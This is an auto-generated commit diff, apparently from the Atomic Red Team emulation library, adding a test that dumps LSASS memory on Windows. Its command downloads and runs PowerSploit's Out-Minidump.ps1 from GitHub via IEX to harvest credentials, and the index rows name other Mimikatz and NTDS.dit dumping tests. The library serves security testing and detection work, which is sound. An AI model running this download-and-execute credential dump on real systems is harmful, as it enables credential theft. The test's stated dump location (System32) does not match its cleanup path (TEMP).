Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

atomics/Indexes/Indexes-CSV/index.csv

@@ -214,6 +214,7 @@ credential-access,T1003.001,LSASS Memory,4,Dump LSASS.exe Memory using direct sy
 credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual
 credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
 credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
+credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell
 credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
 credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -22,6 +22,7 @@ credential-access,T1003.001,LSASS Memory,4,Dump LSASS.exe Memory using direct sy
 credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual
 credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
 credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
+credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell
 credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
 credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt

atomics/Indexes/Indexes-Markdown/index.md

@@ -436,6 +436,7 @@
   - Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager [windows]
   - Atomic Test #6: Offline Credential Theft With Mimikatz [windows]
   - Atomic Test #7: LSASS read with pypykatz [windows]
+  - Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows]
 - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1003.003 NTDS](../../T1003.003/T1003.003.md)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -46,6 +46,7 @@
   - Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager [windows]
   - Atomic Test #6: Offline Credential Theft With Mimikatz [windows]
   - Atomic Test #7: LSASS read with pypykatz [windows]
+  - Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows]
 - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1003.003 NTDS](../../T1003.003/T1003.003.md)

atomics/Indexes/index.yaml

@@ -20494,6 +20494,24 @@ credential-access:
 '
         name: command_prompt
         elevation_required: true
+    - name: Dump LSASS.exe Memory using Out-Minidump.ps1
+      auto_generated_guid: 6502c8f0-b775-4dbd-9193-1298f56b6781
+      description: |
+        The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure
+        powershell implementation that leverages the MiniDumpWriteDump Win32 API call.
+        Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp.
+      supported_platforms:
+      - windows
+      executor:
+        command: 'IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'');
+          get-process lsass | Out-Minidump
+
+'
+        cleanup_command: 'Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
+
+'
+        name: powershell
+        elevation_required: true
   T1557:
     technique:
       external_references:

atomics/T1003.001/T1003.001.md

@@ -40,6 +40,8 @@ The following SSPs can be used to access credentials:
 
 - [Atomic Test #7 - LSASS read with pypykatz](#atomic-test-7---lsass-read-with-pypykatz)
 
+- [Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1](#atomic-test-8---dump-lsassexe-memory-using-out-minidumpps1)
+
 
 <br/>
 
@@ -379,4 +381,34 @@ pip3 install pypykatz
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1
+The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure
+powershell implementation that leverages the MiniDumpWriteDump Win32 API call.
+Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp.
+
+**Supported Platforms:** Windows
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
+```
+
+
+
+
+
 <br/>